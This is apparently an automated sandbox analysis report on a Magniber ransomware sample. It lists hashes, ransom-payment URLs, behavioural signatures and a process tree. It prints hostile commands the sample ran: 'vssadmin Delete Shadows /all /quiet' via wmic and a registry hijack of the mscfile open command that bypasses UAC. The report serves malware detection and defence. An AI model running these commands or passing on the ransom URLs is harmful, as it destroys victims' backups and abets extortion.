Resubmissions
23-08-2021 16:26
210823-tx5an7s74s 1018-08-2021 20:35
210818-2gkvb49v8e 1022-07-2021 19:24
210722-68c2armfnx 10Analysis
-
max time kernel
280s -
max time network
271s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
22-07-2021 19:24
Static task
static1
Behavioral task
behavioral1
Sample
magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe
Resource
win10v20210408
General
-
Target
magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe
-
Size
21KB
-
MD5
4160c35d3c600712b528e8072de1bc58
-
SHA1
12c822103678fed7b928f0202eb7e51714ab3b56
-
SHA256
f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675
-
SHA512
f722f7a5560641b0cbeb73dfb9d495cf2920858acfdcd5806f619256f2810569486be00eee4547b07298ca20c18d478f3f567809a7b2ff9cf81519e057a3a962
Malware Config
Extracted
C:\Users\Admin\Desktop\readme.txt
magniber
http://ea10e838bc14c0409elqcsthxnw.ndkeblzjnpqgpo5o.onion/lqcsthxnw
http://ea10e838bc14c0409elqcsthxnw.wonride.site/lqcsthxnw
http://ea10e838bc14c0409elqcsthxnw.lognear.xyz/lqcsthxnw
http://ea10e838bc14c0409elqcsthxnw.lieedge.casa/lqcsthxnw
http://ea10e838bc14c0409elqcsthxnw.bejoin.space/lqcsthxnw
Signatures
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 8 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.execmd.execmd.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exedescription pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 800 1688 cmd.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1080 1688 cmd.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1008 1688 cmd.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2100 1688 cmd.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2548 1688 vssadmin.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2540 1688 vssadmin.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2652 1688 vssadmin.exe 40 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2692 1688 vssadmin.exe 40 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
taskhost.exedescription ioc Process File renamed C:\Users\Admin\Pictures\RestartApprove.raw => C:\Users\Admin\Pictures\RestartApprove.raw.lqcsthxnw taskhost.exe File renamed C:\Users\Admin\Pictures\ExportCopy.tif => C:\Users\Admin\Pictures\ExportCopy.tif.lqcsthxnw taskhost.exe File opened for modification C:\Users\Admin\Pictures\OpenGet.tiff taskhost.exe File renamed C:\Users\Admin\Pictures\OpenGet.tiff => C:\Users\Admin\Pictures\OpenGet.tiff.lqcsthxnw taskhost.exe File opened for modification C:\Users\Admin\Pictures\SelectClose.tiff taskhost.exe File renamed C:\Users\Admin\Pictures\SelectClose.tiff => C:\Users\Admin\Pictures\SelectClose.tiff.lqcsthxnw taskhost.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exedescription pid Process procid_target PID 1088 set thread context of 1128 1088 magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe 13 PID 1088 set thread context of 1188 1088 magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe 12 PID 1088 set thread context of 1256 1088 magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe 9 -
Interacts with shadow copies 2 TTPs 4 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exepid Process 2548 vssadmin.exe 2540 vssadmin.exe 2652 vssadmin.exe 2692 vssadmin.exe -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc Process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0ab88cf2f7fd701 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000059b3468bc8b4694cae4e502c64594064000000000200000000001066000000010000200000008ce153a7f49b93f9e0cbfff722d151efdec4092155fed18590367d262866b612000000000e80000000020000200000004fc08fbf9238d8d698f578b96d800f7d5122716a55a34ba0536f4975fd32a86b90000000688f55a8919330f149c08f47dee024504061f0ddb9995e064bd3fe09501d71eb87737b9e485d0560dc60417f42d2e1460a5671186f38dfb2cb3bb02cc5062e4e265707ded48b3462ed453371fd89fe09350ffeb4b15076c78c24306f91e7c73fc1a8f4a03623787ec08419a3161104269f8618ab708037720953d5410bd1b9387c1d606b36090692869bb1be2e9ef483400000007686be04249d932f0ccb2704582727717ee28a3840c89b0196b3ab090c93e523f0eed238696ee1b2fb9f42093cd5048ea2490746e8c3bdc4ac74b53a391a1467 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F3BA8411-EB22-11EB-BE93-726C7BD0CD11} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000059b3468bc8b4694cae4e502c6459406400000000020000000000106600000001000020000000383f6114ee592c802351ff124d6eea3e65c3087e3dac8ff69d0bd9d284c24858000000000e8000000002000020000000635e53861964c230287cfca40ec2c6313b8341ff1c1114b45fc452412f2afd2d20000000f6a352773e9f80ea2be4c2cfa0b2b9f3646d8df7dc02bfea81ae3464dfca772040000000d6f157ef09c2631f2cace789b485e97bbd91d3279f31f144c6e90a229364bd7e34516c66b566ac9ae6feca18c39a86b2604cfff887fbd42af93577f25564225a iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "333747068" iexplore.exe -
Modifies registry class 11 IoCs
Processes:
taskhost.exeExplorer.EXEDwm.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell taskhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open taskhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command Dwm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Dwm.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid Process 2044 notepad.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exepid Process 1088 magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe 1088 magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
iexplore.exepid Process 364 iexplore.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exepid Process 1088 magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe 1088 magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe 1088 magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Explorer.EXEWMIC.exeWMIC.exedescription pid Process Token: SeShutdownPrivilege 1256 Explorer.EXE Token: SeShutdownPrivilege 1256 Explorer.EXE Token: SeShutdownPrivilege 1256 Explorer.EXE Token: SeIncreaseQuotaPrivilege 1108 WMIC.exe Token: SeSecurityPrivilege 1108 WMIC.exe Token: SeTakeOwnershipPrivilege 1108 WMIC.exe Token: SeLoadDriverPrivilege 1108 WMIC.exe Token: SeSystemProfilePrivilege 1108 WMIC.exe Token: SeSystemtimePrivilege 1108 WMIC.exe Token: SeProfSingleProcessPrivilege 1108 WMIC.exe Token: SeIncBasePriorityPrivilege 1108 WMIC.exe Token: SeCreatePagefilePrivilege 1108 WMIC.exe Token: SeBackupPrivilege 1108 WMIC.exe Token: SeRestorePrivilege 1108 WMIC.exe Token: SeShutdownPrivilege 1108 WMIC.exe Token: SeDebugPrivilege 1108 WMIC.exe Token: SeSystemEnvironmentPrivilege 1108 WMIC.exe Token: SeRemoteShutdownPrivilege 1108 WMIC.exe Token: SeUndockPrivilege 1108 WMIC.exe Token: SeManageVolumePrivilege 1108 WMIC.exe Token: 33 1108 WMIC.exe Token: 34 1108 WMIC.exe Token: 35 1108 WMIC.exe Token: SeIncreaseQuotaPrivilege 1108 WMIC.exe Token: SeSecurityPrivilege 1108 WMIC.exe Token: SeTakeOwnershipPrivilege 1108 WMIC.exe Token: SeLoadDriverPrivilege 1108 WMIC.exe Token: SeSystemProfilePrivilege 1108 WMIC.exe Token: SeSystemtimePrivilege 1108 WMIC.exe Token: SeProfSingleProcessPrivilege 1108 WMIC.exe Token: SeIncBasePriorityPrivilege 1108 WMIC.exe Token: SeCreatePagefilePrivilege 1108 WMIC.exe Token: SeBackupPrivilege 1108 WMIC.exe Token: SeRestorePrivilege 1108 WMIC.exe Token: SeShutdownPrivilege 1108 WMIC.exe Token: SeDebugPrivilege 1108 WMIC.exe Token: SeSystemEnvironmentPrivilege 1108 WMIC.exe Token: SeRemoteShutdownPrivilege 1108 WMIC.exe Token: SeUndockPrivilege 1108 WMIC.exe Token: SeManageVolumePrivilege 1108 WMIC.exe Token: 33 1108 WMIC.exe Token: 34 1108 WMIC.exe Token: 35 1108 WMIC.exe Token: SeShutdownPrivilege 1256 Explorer.EXE Token: SeShutdownPrivilege 1256 Explorer.EXE Token: SeIncreaseQuotaPrivilege 1268 WMIC.exe Token: SeSecurityPrivilege 1268 WMIC.exe Token: SeTakeOwnershipPrivilege 1268 WMIC.exe Token: SeLoadDriverPrivilege 1268 WMIC.exe Token: SeSystemProfilePrivilege 1268 WMIC.exe Token: SeSystemtimePrivilege 1268 WMIC.exe Token: SeProfSingleProcessPrivilege 1268 WMIC.exe Token: SeIncBasePriorityPrivilege 1268 WMIC.exe Token: SeCreatePagefilePrivilege 1268 WMIC.exe Token: SeBackupPrivilege 1268 WMIC.exe Token: SeRestorePrivilege 1268 WMIC.exe Token: SeShutdownPrivilege 1268 WMIC.exe Token: SeDebugPrivilege 1268 WMIC.exe Token: SeSystemEnvironmentPrivilege 1268 WMIC.exe Token: SeRemoteShutdownPrivilege 1268 WMIC.exe Token: SeUndockPrivilege 1268 WMIC.exe Token: SeManageVolumePrivilege 1268 WMIC.exe Token: 33 1268 WMIC.exe Token: 34 1268 WMIC.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
Explorer.EXEiexplore.exepid Process 1256 Explorer.EXE 364 iexplore.exe 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE -
Suspicious use of SendNotifyMessage 6 IoCs
Processes:
Explorer.EXEpid Process 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid Process 364 iexplore.exe 364 iexplore.exe 2276 IEXPLORE.EXE 2276 IEXPLORE.EXE 2276 IEXPLORE.EXE 2276 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 61 IoCs
Processes:
taskhost.execmd.execmd.exeDwm.exeExplorer.EXEcmd.execmd.execmd.execmd.execmd.execmd.execmd.exeiexplore.exeCompMgmtLauncher.exeCompMgmtLauncher.exeCompMgmtLauncher.exeCompMgmtLauncher.exedescription pid Process procid_target PID 1128 wrote to memory of 2044 1128 taskhost.exe 26 PID 1128 wrote to memory of 2044 1128 taskhost.exe 26 PID 1128 wrote to memory of 2044 1128 taskhost.exe 26 PID 1128 wrote to memory of 1552 1128 taskhost.exe 30 PID 1128 wrote to memory of 1552 1128 taskhost.exe 30 PID 1128 wrote to memory of 1552 1128 taskhost.exe 30 PID 1128 wrote to memory of 1248 1128 taskhost.exe 31 PID 1128 wrote to memory of 1248 1128 taskhost.exe 31 PID 1128 wrote to memory of 1248 1128 taskhost.exe 31 PID 1248 wrote to memory of 1108 1248 cmd.exe 34 PID 1248 wrote to memory of 1108 1248 cmd.exe 34 PID 1248 wrote to memory of 1108 1248 cmd.exe 34 PID 1552 wrote to memory of 364 1552 cmd.exe 38 PID 1552 wrote to memory of 364 1552 cmd.exe 38 PID 1552 wrote to memory of 364 1552 cmd.exe 38 PID 1188 wrote to memory of 1784 1188 Dwm.exe 37 PID 1188 wrote to memory of 1784 1188 Dwm.exe 37 PID 1188 wrote to memory of 1784 1188 Dwm.exe 37 PID 1256 wrote to memory of 1684 1256 Explorer.EXE 39 PID 1256 wrote to memory of 1684 1256 Explorer.EXE 39 PID 1256 wrote to memory of 1684 1256 Explorer.EXE 39 PID 1784 wrote to memory of 1268 1784 cmd.exe 42 PID 1784 wrote to memory of 1268 1784 cmd.exe 42 PID 1784 wrote to memory of 1268 1784 cmd.exe 42 PID 1684 wrote to memory of 1816 1684 cmd.exe 43 PID 1684 wrote to memory of 1816 1684 cmd.exe 43 PID 1684 wrote to memory of 1816 1684 cmd.exe 43 PID 1088 wrote to memory of 1396 1088 44 PID 1088 wrote to memory of 1396 1088 44 PID 1088 wrote to memory of 1396 1088 44 PID 1396 wrote to memory of 1588 1396 cmd.exe 46 PID 1396 wrote to memory of 1588 1396 cmd.exe 46 PID 1396 wrote to memory of 1588 1396 cmd.exe 46 PID 800 wrote to memory of 2128 800 cmd.exe 58 PID 800 wrote to memory of 2128 800 cmd.exe 58 PID 800 wrote to memory of 2128 800 cmd.exe 58 PID 1008 wrote to memory of 2152 1008 cmd.exe 56 PID 1008 wrote to memory of 2152 1008 cmd.exe 56 PID 1008 wrote to memory of 2152 1008 cmd.exe 56 PID 1080 wrote to memory of 2164 1080 cmd.exe 57 PID 1080 wrote to memory of 2164 1080 cmd.exe 57 PID 1080 wrote to memory of 2164 1080 cmd.exe 57 PID 2100 wrote to memory of 2212 2100 cmd.exe 59 PID 2100 wrote to memory of 2212 2100 cmd.exe 59 PID 2100 wrote to memory of 2212 2100 cmd.exe 59 PID 364 wrote to memory of 2276 364 iexplore.exe 60 PID 364 wrote to memory of 2276 364 iexplore.exe 60 PID 364 wrote to memory of 2276 364 iexplore.exe 60 PID 364 wrote to memory of 2276 364 iexplore.exe 60 PID 2128 wrote to memory of 2300 2128 CompMgmtLauncher.exe 61 PID 2128 wrote to memory of 2300 2128 CompMgmtLauncher.exe 61 PID 2128 wrote to memory of 2300 2128 CompMgmtLauncher.exe 61 PID 2152 wrote to memory of 2316 2152 CompMgmtLauncher.exe 62 PID 2152 wrote to memory of 2316 2152 CompMgmtLauncher.exe 62 PID 2152 wrote to memory of 2316 2152 CompMgmtLauncher.exe 62 PID 2212 wrote to memory of 2416 2212 CompMgmtLauncher.exe 66 PID 2212 wrote to memory of 2416 2212 CompMgmtLauncher.exe 66 PID 2212 wrote to memory of 2416 2212 CompMgmtLauncher.exe 66 PID 2164 wrote to memory of 2428 2164 CompMgmtLauncher.exe 65 PID 2164 wrote to memory of 2428 2164 CompMgmtLauncher.exe 65 PID 2164 wrote to memory of 2428 2164 CompMgmtLauncher.exe 65
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Users\Admin\AppData\Local\Temp\magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe"C:\Users\Admin\AppData\Local\Temp\magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1088 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵PID:1588
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵PID:1816
-
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1268
-
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2044
-
-
C:\Windows\system32\cmd.execmd /c "start http://ea10e838bc14c0409elqcsthxnw.wonride.site/lqcsthxnw^&1^&43087494^&65^&319^&12"2⤵
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://ea10e838bc14c0409elqcsthxnw.wonride.site/lqcsthxnw&1&43087494&65&319&123⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:364 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:364 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2276
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1108
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2300
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2428
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1008 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2316
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2416
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2548
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2540
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2652
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2692
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2760
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
db293a4d8871a4804d5db971b46795b4
SHA127d7883a0c328a8ce5dd16cfd29dfb41ec3d63f5
SHA256a8e47f430b530839b12b47b1c48088f28bd2c283711396583b851df1e8afafd5
SHA512bf833675eebd44b699a6bc6bdbe92a8ea9abb3afe0393d534bdb8e8e37ca854fade8690ba8a32936271035065dce8b4e1665f45ed3cb356a57ca243020b649ec
-
MD5
8ab6bc851c3a7e94c29e1bd46256d66d
SHA1fe95f30de2d75ba592090f19ed738588138cc0a4
SHA25690f8ba051b5e991c143ff5ec83c9b3a164a3c8bb015228073d7d314f4954aa58
SHA512f49b4ec3480438fc30e79e67dc42ffbf60e11a5a392f3ab1344eae52116ff91da0acacec5556d98f67b8511c5b1ce9f354a5d2ebae163d3ffb7daf64cbd98bef
-
MD5
2441f5a6c060eb16c926f746aef7e1d5
SHA172a2b1ee7a3354792c6682870bb41a0cf2bf5606
SHA256aeb9c1c0afe3d628b8fd6808dc5df70999532016724a3fd491a725b7a7d1432f
SHA51274fb556917c57ec862d90e59e0a9962ac12550cc5f777cce03fc49d7776e03270cc22089ebb128bcb0bff22973ed58ec4a1c4871e069140ed2c429a3ab1266a1
-
MD5
485caa19879e4971504c2bca9858ed3c
SHA1d6193f77a6352d10fcdc474107f66822db0d10df
SHA2561ef3f6327e9a8b365cab54d31b54332140dd82fb8e6ab25b7eeb8b222e5adfca
SHA5121168abfc8fde3289db9bf50f9ab40ced0415d72016268fa80cd0d32a5b8266f26229f07643ca7df81e7b8e90bcb5ed8542bafd7ba1db9225f708c17ec7974c39
-
MD5
51fd8ccbf6b32651e3db3f1d16658cd8
